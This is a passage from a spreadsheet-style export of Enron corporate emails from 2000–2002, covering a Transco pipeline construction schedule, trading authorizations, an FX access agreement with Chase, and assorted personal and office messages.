Moran/ENRON@enronXgate, Claudia Clark/HOU/ECT@ECT, William S _x000D_
Bradford/ENRON@enronXgate, Lisa Lees/HOU/ECT@ECT, Juana _x000D_
Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, _x000D_
Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, _x000D_
Karen O'Day/NA/Enron@Enron, Tanya Rohauer/ENRON@enronXgate, Kelly _x000D_
Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron _x000D_
Communications, EOL Call Center@ECT, Bernice Rodriguez/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect, Amy Heffernan/Enron Communications@Enron Communications, _x000D_
Molly LaFuze/Enron Communications@Enron Communications, Danny Clark/Enron _x000D_
Communications@Enron Communications, Stephanie Panus/NA/Enron@Enron, Teresa _x000D_
Mandola/Corp/Enron@Enron, Bill Kyle/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: EOL approvals, 04-10-01_x000D_
_x000D_
Please see attached; thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Feb 2002 13:57:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'judy.townsend@enron.com', 'andrea.ring@enron.com', 'meredith.homco@enron.com', 'chuck.ames@enron.com'})</t>
  </si>
  <si>
    <t>FW: Major 2002 Construction Projects</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	CustomerNotices, WGPHOU [mailto:WGPHOU.CustomerNotices@Williams.com] _x000D_
Sent:	Thursday, February 28, 2002 3:30 PM_x000D_
Subject:	Major 2002 Construction Projects_x000D_
_x000D_
February 28, 2002_x000D_
_x000D_
To:	Transcontinental Gas Pipe Line Customers and Shippers_x000D_
_x000D_
Re:	Major 2002 Construction Projects_x000D_
_x000D_
The projects listed below are the major pipeline and station _x000D_
construction projects that are currently scheduled for the 2002 _x000D_
construction season.  Dates and duration of these jobs may change prior _x000D_
to construction.  Additional information will be forthcoming on a _x000D_
particular job if there are significant impacts to available capacity._x000D_
_x000D_
Unless specifically stated to the contrary, the following jobs will not _x000D_
impact firm transportation.  However, based on past summer operating _x000D_
conditions, it is anticipated that interruptible transportation _x000D_
services (IT and secondary FT) may be impacted by some of the work.  _x000D_
The extent of the impact will depend on operating conditions at the _x000D_
time of the outages._x000D_
_x000D_
Job No. 1 - _x000D_
Brazos River, Texas, Smart Pig Project_x000D_
Smart pig 34 miles of Main Line "B" from the near the Brazos River, _x000D_
Texas (M.P. 293.29)(Fort Bend County) to Compressor Station 35 near _x000D_
Houston, Texas (M.P. 327.27)(Harris County).  Estimated outage timing _x000D_
for preparatory: June 3, 2002, to June 8, 2002.  Estimated timing for _x000D_
smart pig runs: June 11, 2002, and June 14, 2002.  Estimated outage _x000D_
timing for anomaly repair, if required: September 30, 2002, to November _x000D_
8, 2002._x000D_
_x000D_
Job No. 2 - _x000D_
Brazos River, Texas, Pipe Replacement Project_x000D_
Replace pipe on Main Lines "A" and "B" between the Brazos River, Texas _x000D_
(M.P. 293.29)(Fort Bend County) and Compressor Station 35 near Houston, _x000D_
Texas (M.P. 327.27)(Harris County).  Estimated outage timing: June 14, _x000D_
2002, to August 6, 2002._x000D_
_x000D_
Job No. 3 - _x000D_
Amite River, Louisiana, Pipe Replacement Project_x000D_
Replace pipe on Main Lines "A", "B", and "C" between Compressor Station _x000D_
60 near Jackson, Louisiana (M.P. 588.60)(East Feliciana Parish) and _x000D_
Compressor Station 65 near Greensburg, Louisiana (M.P. 626.53)(St. _x000D_
Helena Parish). During work on Main Line "B", Mid-Louisiana Gas Clinton _x000D_
M&amp;R 4399 will be out of service.  Estimated outage timing: August 24, _x000D_
2002, to September 26, 2002._x000D_
_x000D_
Job No. 4 - _x000D_
Momentum Expansion Project_x000D_
Work on the Momentum Expansion Project will result in brief outages at _x000D_
several compressor stations and pipeline segments in September 2002 and _x000D_
October 2002.  Outages will occur to tie-in or modify piping at _x000D_
Compressor Station 90 near Sweetwater, Alabama (M.P. 811.13) (Marengo _x000D_
County); Compressor Station 105 near Rockford, Alabama (M.P. 927.06) _x000D_
(Coosa County); and Compressor Station 160 near Reidsville, North _x000D_
Carolina (M.P. 1369.40) (Rockingham County)._x000D_
Job No. 5 - _x000D_
Newnan, Georgia, Pipe Replacement Project_x000D_
Replace pipe on Main Lines "A", "B", "C", and "D" between Compressor _x000D_
Station 115 near Newnan, Georgia (M.P. 1007.55) (Coweta County) and _x000D_
Compressor Station 120 near Stockbridge, Georgia (M.P. 1048.34) (Henry _x000D_
County). Estimated outage timing: April 16, 2002, to July 15, 2002._x000D_
_x000D_
Job No. 6 - _x000D_
Stockbridge, Georgia, SCC Hydrostatic Test Project_x000D_
Perform a Stress Corrosion Cracking (SCC) hydrostatic test on 15 miles _x000D_
of Main Line "A" between Compressor Station 120 near Stockbridge, _x000D_
Georgia (M.P. 1048.34) (Henry County) and Compressor Station 125 near _x000D_
Monroe, Georgia (M.P. 1085.97) (Walton County). Estimated outage _x000D_
timing: April 6, 2002, to April 30, 2002._x000D_
_x000D_
Job No. 7 - _x000D_
North Georgia Extension Pipe Replacement Project_x000D_
Pipe replacement in the last two valve sections (Gwinnett County) at _x000D_
the end of North Georgia Extension Lateral 16-inch line; lateral _x000D_
originates at Compressor Station 125 near Monroe, Georgia (M.P. _x000D_
1085.97) (Walton County). During work in the valve section at the far _x000D_
end of the lateral, the City of Lawrenceville Lawrenceville M&amp;R 7013, _x000D_
the Atlanta Gas Light Suwanee M&amp;R 7203, the City of Buford West Buford _x000D_
M&amp;R 7197, and the City of Sugar Hill M&amp;R 7217 will be out of service.  _x000D_
Estimated timing for the outage at end of lateral with meter stations _x000D_
out of service: June 13, 2002, to June 15, 2002.  Estimated outage _x000D_
timing for the other valve section with meter stations remaining in _x000D_
service: June 21, 2002, to July 22, 2002._x000D_
_x000D_
Job No. 8 - _x000D_
Comer, Georgia, Smart Pig Project_x000D_
Smart pig 81 miles of Main Line "B" from Compressor Station 130 near _x000D_
Comer, Georgia (M.P. 1124.71)(Madison County) to Compressor Station 140 _x000D_
near Moore, South Carolina (M.P. 1205.80) (Spartanburg County).  _x000D_
Estimated outage timing for preparatory: June 8, 2002, to June 15, _x000D_
2002.  Estimated timing for smart pig runs: June 18, 2002, and June 20, _x000D_
2002.  Estimated outage timing for anomaly repair, if required: June _x000D_
22, 2002, to October 1, 2002._x000D_
_x000D_
Job No. 9 - _x000D_
Grover, North Carolina, Pipe Replacement Project_x000D_
Replace pipe on Main Lines "A", "B", "C", and "D" between Compressor _x000D_
Station 140 near Moore, South Carolina (M.P. 1205.80)(Spatanburg _x000D_
County) and Compressor Station 145 near Grover, North Carolina (M.P. _x000D_
1247.03)(Cleveland County).  Estimated outage timing: April 20, 2002, _x000D_
to May 27, 2002._x000D_
_x000D_
Job No. 10 - _x000D_
Sundance Expansion Project_x000D_
Work on the Sundance Expansion Project will result an outages at _x000D_
Compressor Station 150 near Mooresville, North Carolina (M.P. _x000D_
1287.11)(Iredell County) from March 8, 2002, to March 10, 2002_x000D_
_x000D_
Job No. 11 - _x000D_
Mooresville, North Carolina, Pipe Replacement Project_x000D_
Replace pipe on Main Lines "A", "B", "C", and "D" between Compressor _x000D_
Station 150 near Mooresville, North Carolina (M.P. 1287.11)(Iredell _x000D_
County) and Compressor Station 155 near Lexington, North Carolina (M.P. _x000D_
1326.11) (Davidson County).  Estimated outage timing: April 13, 2002, _x000D_
to May 27, 2002._x000D_
_x000D_
Job No. 12 - _x000D_
Lexington, North Carolina, Smart Pig Project_x000D_
Smart pig 54 miles of Main Line "B" from near Compressor Station 155 _x000D_
near Lexington, North Carolina (M.P. 1326.11) (Davidson County) to near _x000D_
Compressor Station 160 near Reidsville, North Carolina (M.P. 1369.40) _x000D_
(Rockingham County).  Estimated outage timing for preparatory: June 27, _x000D_
2002, to July 12, 2002.  Estimated timing for smart pig runs: July 16, _x000D_
2002, and July 17, 2002.  Estimated outage timing for anomaly repair, _x000D_
if required: July 19, 2002, to September 22, 2002._x000D_
_x000D_
Job No. 13 - _x000D_
Chatham, Virginia, Smart Pig Project_x000D_
Smart pig 71 miles of Main Line "B" from near Compressor Station 160 _x000D_
near Reidsville, North Carolina (M.P. 1369.40) (Rockingham County) to _x000D_
near Compressor Station 170 near Appomattox, Virginia (M.P. 1457.00) _x000D_
(Appomattox County).  Estimated outage timing for preparatory: July 22, _x000D_
2002, to July 27, 2002.  Estimated outage timing for smart pig runs: _x000D_
July 30, 2002, and July 31, 2002.  Estimated outage timing for anomaly _x000D_
repair, if required: August 3, 2002, to October 12, 2002._x000D_
_x000D_
Job No. 14 - _x000D_
Manassas, Virginia, Pipe Replacement Project_x000D_
Replace pipe on Main Lines "A", "B", and "C" between Compressor Station _x000D_
180 near Unionville, Virginia (M.P. 1540.37)(Orange County) and _x000D_
Compressor Station 185 near Manassas, Virginia (M.P. 1583.43) (Prince _x000D_
William County).  Estimated outage timing: June 29, 2002, to September _x000D_
27, 2002._x000D_
_x000D_
Job No. 15 - _x000D_
Cove Point Pipeline Smart Pig Project_x000D_
Smart pig 88 miles of pipeline from the Cove Point LNG Plant in Calvert _x000D_
County, Maryland, to the Loudon interconnect meter stations in Loudon _x000D_
County, Virginia. Pipeline valve section outages will be coordinated _x000D_
closely with customers to minimize any operational impact.  Estimated _x000D_
outage timing for preparatory: April 20, 2002, to May 6, 2002.  _x000D_
Estimated timing for smart pig run: May 10, 2002.  Estimated outage _x000D_
timing for anomaly repair, if required: May 11, 2002, to June 18, 2002._x000D_
_x000D_
Job No. 16 - _x000D_
Frazer, Pennsylvania, Smart Pig Project_x000D_
Smart pig 43 miles of Main Line "A" from Compressor Station 200 near _x000D_
Frazer, Pennsylvania (M.P. 1722.24)(Chester County) to the Delaware _x000D_
River (M.P. 1765.48) (Bucks County).  Estimated outage timing for _x000D_
preparatory: May 4, 2002, to June 4, 2002.  Estimated timing for smart _x000D_
pig runs: June 6, 2002, and June 11, 2002.  Estimated outage timing for _x000D_
anomaly repair, if required: August 31, 2002, to October 17, 2002._x000D_
_x000D_
Job No. 17 - _x000D_
Lower New York Bay Lateral Pig Project_x000D_
Pig 35 miles of Lower New York Bay Lateral from near Sayreville, New _x000D_
Jersey (Middlesex County) to the KeySpan Long Beach M&amp;R 6210 on Long _x000D_
Island New York (Nassau County).  Estimated timing for smart pig runs: _x000D_
March 28, 2002, and April 16, 2002._x000D_
_x000D_
Job No. 18 - _x000D_
Raritan River Smart Pig Project_x000D_
Smart pig 24 miles of Main Line `A' from near the Raritan River, New _x000D_
Jersey (M.P. 1794.85) (Middlesex County) through Union County, New _x000D_
Jersey, to near the Passaic River, New Jersey (M.P. 1819.10) (Essex _x000D_
County).  Estimated timing for the smart pig run: April 30, 2002._x000D_
_x000D_
Job No. 19 - _x000D_
Long Island Extension Smart Pig Project _x000D_
Smart pig 12 miles of the Long Island Extension from the Linden _x000D_
Regulator Station, New Jersey (M.P. 1808.19) (Union County) to Long _x000D_
island Extension Milepost 11.57 across the Narrows into Kings County, _x000D_
New York. At various time there will be outages at PSE&amp;G Piles Creek _x000D_
M&amp;R 6028, KeySpan Narrows M&amp;R 6062, and KeySpan Richmond-Narrows M&amp;R _x000D_
6028.  Estimated timing for the smart pig runs: March 26, 2002, April _x000D_
10, 2002, and June 13, 2002.  Estimated outage timing for anomaly _x000D_
repair, if required: September 2, 2002, to September 14, 2002, to June _x000D_
26, 2002._x000D_
_x000D_
Job No. 20 - _x000D_
Paterson Lateral and New Jersey Extension Smart Pig Project_x000D_
Smart pig 7 miles of the Paterson Lateral, New Jersey (Bergen and _x000D_
Passaic Counties) and perform anomaly investigation work on 19 miles of _x000D_
the North New Jersey Extension, New Jersey (Bergen County).  At various _x000D_
times there may be outages at TGT Rivervale M&amp;R 3091, PSE&amp;G Emerson M&amp;R _x000D_
6087, PSE&amp;G Paramus M&amp;R 6147, PSE&amp;G Fairlawn M&amp;R 6091, and PSE&amp;G _x000D_
Paterson M&amp;R 6047.  Estimated timing for the smart pig run: April 23, _x000D_
2002.   Estimated outage timing for anomaly repair, if required: May 7, _x000D_
2002, to May 14, 2002 for the North New Jersey Extension and July 8, _x000D_
2002, to July 13, 2002, for the Paterson Lateral_x000D_
_x000D_
Job No. 21 - _x000D_
Bear Creek, Pennsylvania, DOT Hydrostatic Test Project_x000D_
Perform a DOT hydrostatic test on 10 miles of Leidy Line "B" between _x000D_
Compressor Station 515 near Bear Creek, Pennsylvania (Leidy Line M.P. _x000D_
68.97)(Columbia County) and Compressor Station 517 near Benton, _x000D_
Pennsylvania (Leidy Line M.P. 115.19)(Luzerne County). Estimated outage _x000D_
timing: September 28, 2002, to October 5, 2002._x000D_
_x000D_
Job No. 22 - _x000D_
Leidy East and Market Link Phase II Expansion Projects_x000D_
Work on the Leidy East and Market Link Phase II Expansion Projects will _x000D_
result in several outages between May 2002 and October 2002.  Pipeline _x000D_
construction and facilities modifications are scheduled on the Leidy _x000D_
Line in Clinton, Lycoming, Columbia, Luzerne, and Northampton Counties, _x000D_
Pennsylvania, and Hunterdon and Warren Counties, New Jersey.  Pipeline _x000D_
construction is scheduled for Main Line "B" in Somerset County, New _x000D_
Jersey.  Compressor station outages are scheduled for Compressor _x000D_
Station 205 near Princeton, New Jersey (M.P. 1773.40)(Mercer County); _x000D_
Compressor Station 505 near Raritan, New Jersey (Leidy Line M.P. _x000D_
0.00)(Hunterdon County); Compressor Station 515 near Bear Creek, _x000D_
Pennsylvania (Leidy Line M.P. 68.97)(Luzerene County); and Compressor _x000D_
Station 520 near Salladasburg, Pennsylvania (Leidy Line M.P. _x000D_
157.64)(Lycoming County)._x000D_
_x000D_
Work includes a pipeline replacement and construction of a pipeline _x000D_
loop on the Trenton-Woodbury Lateral. All work will be performed in _x000D_
close coordination with potentially affected customers._x000D_
_x000D_
Job No. 23 - _x000D_
Air Emissions Reduction Program_x000D_
Work for the Air Emissions Reduction Program will result in outages _x000D_
throughout 2002 for several entire compressor stations and for _x000D_
individual compressor units at several other compressor stations.  _x000D_
Outages for entire compressor stations are currently scheduled for _x000D_
Compressor Station 30 near El Campo, Texas (M.P. 258.43)(Wharton _x000D_
County); Compressor Station 35 near Houston, Texas (M.P. 327.27)(Harris _x000D_
County); and Compressor Station 190 near Ellicott City, Maryland (M.P. _x000D_
1628.78)(Howard County).  Outages for individual units are currently _x000D_
scheduled at Compressor Station 90 near Sweetwater, Alabama (M.P. _x000D_
811.13)(Marengo County); Compressor Station 120 near Stockbridge, _x000D_
Georgia (M.P. 1048.34)(Henry County); Compressor Station 155 near _x000D_
Lexington, North Carolina (M.P. 1326.11)(Davidson County); Compressor _x000D_
Station 160 near Reidsville, North Carolina (M.P. 1369.40)(Rockingham _x000D_
County); Compressor Station 170 near Appomattox, Virginia (M.P. _x000D_
1457.00)(Appomattox County); Compressor Station 180 near Unionville, _x000D_
Virginia (M.P. 1540.37)(Orange County); and Compressor Station 185 near _x000D_
Manassas, Virginia (M.P. 1583.43)(Prince William County)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 09:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.sevitz@enron.com', 'randy.pais@enron.com'})</t>
  </si>
  <si>
    <t>Co Op City EPC contract</t>
  </si>
  <si>
    <t xml:space="preserve">Here 'tis:_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mike, I will try and call you on Monday - I spoke to Kish about Arcor - he is _x000D_
working on it._x000D_
_x000D_
Hang in there ...._x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sally.beck@enron.com', 'fernley.dyson@enron.com'})</t>
  </si>
  <si>
    <t>Re: Cocoa Trading</t>
  </si>
  <si>
    <t xml:space="preserve">I am going to watch this closely - you may get some feedback !!_x000D_
---------------------- Forwarded by Mike Jordan/LON/ECT on 18/01/2001 13:57 _x000D_
---------------------------_x000D_
_x000D_
Andrew Cornfield_x000D_
17/01/2001 21:12_x000D_
_x000D_
To: Gary Hickerson/HOU/ECT@ECT_x000D_
cc: Paul Sentance/LON/ECT@ECT, Michael Pitt/EU/Enron@Enron, Sheila _x000D_
Glover/HOU/ECT@ECT, Michael J Hutchinson/EU/Enron@Enron (bcc: Mike _x000D_
Jordan/LON/ECT)_x000D_
_x000D_
Subject: Re: Cocoa Trading  _x000D_
_x000D_
Gary_x000D_
_x000D_
This follows on from discussions with RAC regarding what the softs broker _x000D_
traders are authorised for i.e. broking. If we are going to have them trading _x000D_
positions then this needs to be transparent._x000D_
_x000D_
I'm in Germany tommorrow but can be reached on my mobile +44 7973 740 478 if _x000D_
you wish to discuss._x000D_
_x000D_
Regards_x000D_
Andy_x000D_
_x000D_
_x000D_
_x000D_
Ed Dablin@ENRON_x000D_
17/01/2001 17:14_x000D_
To: Gary Hickerson/HOU/ECT@ECT, Michael J Hutchinson/EU/Enron@Enron_x000D_
cc: Andrew Cornfield/LON/ECT@ECT, Michael Pitt/EU/Enron@Enron _x000D_
_x000D_
Subject: Cocoa Trading_x000D_
_x000D_
I have given Nigel Majurey and James Willis discretion to trade 3,000 mt of _x000D_
our 6,000 mt outright position limit. Andy tells me I should have asked your _x000D_
authority to delegate. Can you confirm your approval or disapproval please_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 23:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sanjay.konur@enron.com'})</t>
  </si>
  <si>
    <t>Re: Chris Foster</t>
  </si>
  <si>
    <t>Sanjay:_x000D_
_x000D_
Thanks for the call yesterday.  I would like to keep you squarely in the deal _x000D_
as I think are probaility of close goes up dramatically.  I will try to _x000D_
figure out a way to get you some money if we get the deal done._x000D_
_x000D_
What month did we say we will start this?  June?_x000D_
_x000D_
C</t>
  </si>
  <si>
    <t>Thu, 12 Jul 2001 09:31:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>golf @ houstonian early Sun am?  I might have an "in" with Frank (Pickles) at Amerex._x000D_
_x000D_
flet</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 15:58:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'breakingnews@cnn.com'})</t>
  </si>
  <si>
    <t>frozenset({'textbreakingnews@cnnimail4.cnn.com'})</t>
  </si>
  <si>
    <t>BREAKING NEWS from CNN.com_x000D_
_x000D_
-- Attorneys say McVeigh will not appeal to Supreme Court. Details soon._x000D_
_x000D_
For complete coverage of this story visit:_x000D_
http://www.CNN.com_x000D_
_x000D_
========================================================_x000D_
To UNSUBSCRIBE or SUBSCRIBE to any CNN E-MAIL service visit:_x000D_
http://www.CNN.com/EMAIL_x000D_
_x000D_
(c) 2001 Cable News Network, Inc._x000D_
An AOL Time Warner Company_x000D_
_x000D_
_x000D_
_x000D_
CNN Interactive email id:29417185801131651</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 07:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.c.bourne@williams.com'})</t>
  </si>
  <si>
    <t>Northern Natural Gas Company SLA Filing</t>
  </si>
  <si>
    <t>Per our discussion this afternoon, here is the URL at the FERC website for _x000D_
the NNG SLA filing:_x000D_
_x000D_
http://rimsweb1.ferc.fed.us/rims.q?rp2~rimsdocinfo~2101389</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 12:14:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cassandra.schultz@enron.com', 'donna.lowry@enron.com', 's..bradford@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>FW: Access Agreements</t>
  </si>
  <si>
    <t>Gary has authorized on-line FX trading with JP Morgan Chase.  We have an existing Master Agreement with Chase and would be extending our relationship to include Online Currency Trading.  Chase is a major trading partner for the Rate &amp; Currency group. _x000D_
_x000D_
Sheila_x000D_
_x000D_
-----Original Message-----_x000D_
From: Shackleton, Sara _x000D_
Sent: Monday, October 01, 2001 11:30 AM_x000D_
To: Glover, Sheila_x000D_
Cc: Heard, Marie_x000D_
Subject: FW: Access Agreements_x000D_
_x000D_
_x000D_
Sheila:  Please send your usual message on this one.  I assume it is for ECT Investments Inc._x000D_
Thanks.  Sara_x000D_
_x000D_
-----Original Message-----_x000D_
From: Dallmann, Shane _x000D_
Sent: Monday, September 24, 2001 8:45 AM_x000D_
To: Shackleton, Sara_x000D_
Subject: FW: Access Agreements_x000D_
_x000D_
_x000D_
Sara,_x000D_
_x000D_
We are setting up access to JP Morgan's online FX system. These are the documents they sent us to get signed before they will give us access. Are you the correct person to send them to?_x000D_
_x000D_
Regards,_x000D_
Shane_x000D_
_x000D_
-----Original Message-----_x000D_
From: CLAIRE.BURLEY@chase.com [mailto:CLAIRE.BURLEY@chase.com]_x000D_
Sent: 18 September 2001 17:36_x000D_
To: Dallmann, Shane_x000D_
Subject: Access Agreements_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Claire Burley/CHASE on 18/09/2001 17:35_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Tracey Tommasini_x000D_
18/09/2001 13:37_x000D_
_x000D_
Legal Department  +44 (0)20 7777 4880    Fax Number: +44 (0)20 7777 4758_x000D_
_x000D_
To:   shane.dallman@enron.com_x000D_
cc:   Claire Burley/CHASE@CHASE, Anna Bell-Booth/CHASE@CHASE_x000D_
Subject:  Access Agreements_x000D_
_x000D_
At the request of Claire Burley, attached please find the:_x000D_
_x000D_
          Access Agreement_x000D_
          ChaseFX - Electronic Trading Service_x000D_
          Additional Terms Covering FX Transactions_x000D_
          Authorized Users - Single FX Trade_x000D_
          NetMatch Schedule_x000D_
          NetMatch Authorized Users_x000D_
_x000D_
between Enron North America and The Chase Manhattan Bank._x000D_
_x000D_
Please  note  that the attached documents can be viewed and printed but not_x000D_
edited.  Please print, review and complete the Address for Notices which is_x000D_
located  on page five of the Access Agreement as well as the Designation of_x000D_
Authorized   Users   Form(s)   and  have  an  authorized  officer  of  your_x000D_
organization  sign  each  of  the  agreements  and return two (2) hard copy_x000D_
executed agreements to the attention of Tracey Tommasini, Legal Department,_x000D_
The Chase Manhattan Bank, 125 London Wall, London  EC2Y 5AJ, United Kingdom_x000D_
for further execution._x000D_
_x000D_
Please provide an incumbency certificate signed by the Corporate Secretary_x000D_
for the person or persons who sign the agreements and form._x000D_
_x000D_
Should  you have any questions, please contact Andrew Hamper on +44 20 7777_x000D_
1803._x000D_
_x000D_
Tracey Tommasini_x000D_
Assistant_x000D_
_x000D_
1.   (See attached file: Access Agreement (US law).doc)_x000D_
2.   (See attached file: Chase FX Electronic Trading Service.doc)_x000D_
3.   (See attached file: Additional FX Terms.doc)_x000D_
4.   (See attached file: Authorized Users-Single FX Trade.doc)_x000D_
5.      (See    attached    file:   NetMatch   Schedule   with   Settlement_x000D_
Instructions.doc)_x000D_
6.     (See  attached  file:  NetMatch  Authorized  Users  with  Settlement_x000D_
Instructions.doc)</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 09:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brilowery@aol.com'})</t>
  </si>
  <si>
    <t>Re: Everythings Big in Texas?</t>
  </si>
  <si>
    <t xml:space="preserve">The house thing is a tough call.  It's hard to say.   If you're not in any _x000D_
hurry to buy, the summer should give_x000D_
you a good indication of continuing energy problems.  I personally think that _x000D_
the problem will come and go _x000D_
for a while, but a lot depends on how California's legislature deals with the _x000D_
situation.  I have no idea what _x000D_
they'll end up doing - they've acted pretty poorly already._x000D_
_x000D_
What's your time frame on a house?  If you're only concern is that prices are _x000D_
at their highest level in the last _x000D_
decade, I wouldn't worry too much about that.  It's impossible to time the _x000D_
market -  who would've thought _x000D_
San Francisco's housing prices would be at these current levels.   There are _x000D_
also a lot of intangibles associated _x000D_
with home ownership as your aware of.   _x000D_
_x000D_
I would be concerned about the energy situation, so just try to keep abreast _x000D_
of it.  Also, you could call me if you_x000D_
have any questions.  I'll try to help the best I can.  Take care and tell Kim _x000D_
and Kendall I said hi._x000D_
_x000D_
Kevin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
BriLowery@aol.com on 01/22/2001 10:48:39 PM_x000D_
To: Kevin.Ruscitti@enron.com_x000D_
cc:  _x000D_
Subject: Everythings Big in Texas?_x000D_
_x000D_
_x000D_
Chump!_x000D_
This energy crisis is making me question  my timing on buying a house.  I'm_x000D_
thinking if the economy tanks the housing prices will dip a little.  They_x000D_
just crack the highs of 1989 this last two years.  Any opinions?_x000D_
_x000D_
I start my Texas travel in February.  I'll be in Dallas for the first full_x000D_
week and back in March in Dallas again.  Starting the end of March I'll be_x000D_
there almost every week for about 6 months.  You'll be seeing more of me than_x000D_
you want.  When we get closer to March I'll give you a buzz to set up some_x000D_
dates._x000D_
Sorry about the Kendall picture, I'll try again._x000D_
_x000D_
Take care, B_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 02:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Valentis</t>
  </si>
  <si>
    <t>Paul:_x000D_
_x000D_
  With respect to Valentis:_x000D_
_x000D_
 (a)  Does the MAC apply to both S&amp;P and Moody's?  (not clear from worksheet)_x000D_
 (b)  Are the financial covenants Events of Default or Termination Events?  _x000D_
(looks like these were Termination Events in AIG)_x000D_
 (c)  Is this deal two-way margining?  You have set 0 Thresholds but _x000D_
indicated Return/Delivery for both parties.  Our discussion of last week may _x000D_
have changed (we discussed one-way margining for CP only)._x000D_
_x000D_
I'll have the same questions for CD Holdings._x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 00:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: waiting</t>
  </si>
  <si>
    <t>maine impossible to get to...next option?</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 01:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Package Delivery</t>
  </si>
  <si>
    <t>Irena,_x000D_
_x000D_
Someone delivered an envelope for you.  I put it in your top right desk _x000D_
drawer._x000D_
_x000D_
Robin</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rod.hayslett@enron.com', 'jerry.peters@enron.com', 'james.saunders@enron.com'})</t>
  </si>
  <si>
    <t>James S. Hathorn Resume</t>
  </si>
  <si>
    <t xml:space="preserve">Please see attached resume!_x000D_
_x000D_
Thanks,_x000D_
James_x000D_
---------------------- Forwarded by James Centilli/ET&amp;S/Enron on 11/13/2000 _x000D_
03:32 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  John Shafer                           11/13/2000 03:03 PM_x000D_
	_x000D_
_x000D_
To: James Centilli/ET&amp;S/Enron@ENRON_x000D_
cc: Louis Soldano/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Help?_x000D_
_x000D_
James,_x000D_
_x000D_
I enjoyed being with you during our most recent trip and meeting with SoCAl _x000D_
Gas in Los Angeles.  After getting to know you (at least briefly) I was _x000D_
wondering if you could give me a little help.  My son-in-law is a young CPA _x000D_
who now works for Reliant Energy in Shreveport.  We have been circulating his _x000D_
resume a little around Enron and have gotten little interest.  Do you know _x000D_
anyone in the finanace end of the business (accounting, etc.) in which you _x000D_
could pass his resume along.  I would really appreciate any help you could _x000D_
give me.  Thanks, John Shafer_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 05:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sstojic@gbmdc.com', 'fkelly@gbmdc.com'})</t>
  </si>
  <si>
    <t>Operational Control (Gallup)</t>
  </si>
  <si>
    <t xml:space="preserve">Steve and Frank, I would be very interested in your comments on the attached._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 11:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>your help</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Rick,_x000D_
I hope I can catch u before u leave for Brussels.  I've been trying to _x000D_
contact Linda R, but she seems to be very busy.  Any suggestions on how  to _x000D_
get a chance to talk to her.  Thanx,  I appreicate your help.  _x000D_
xi xi_x000D_
_x000D_
----- Forwarded by Xi Xi/Enron Communications on 06/04/01 06:25 PM -----_x000D_
_x000D_
	Xi Xi_x000D_
	Sent by: Xi Xi_x000D_
	05/16/01 04:52 PM_x000D_
		 _x000D_
		 To: Linda Robertson/NA/Enron@ENRON_x000D_
		 cc: Richard Shapiro/NA/Enron@ENRON_x000D_
		 Subject: Introductions _x000D_
_x000D_
Dear Linda,_x000D_
_x000D_
 _x000D_
I haven't been formally introduced to you, although I have seen you several _x000D_
times in the Houston offsites.  In the past 16 months, I have been working in _x000D_
Government and Regulatory Affairs group covering EBS global telecommunication _x000D_
issues.  Currently,  I am on secondment in London to help Jan Haizmann with _x000D_
European and Asian telecommunication licensing procedures. This September, I _x000D_
will be starting the Johns Hopkins School of Advanced International Studies _x000D_
(SAIS) master program in Washington DC.  I have a strong interest in staying _x000D_
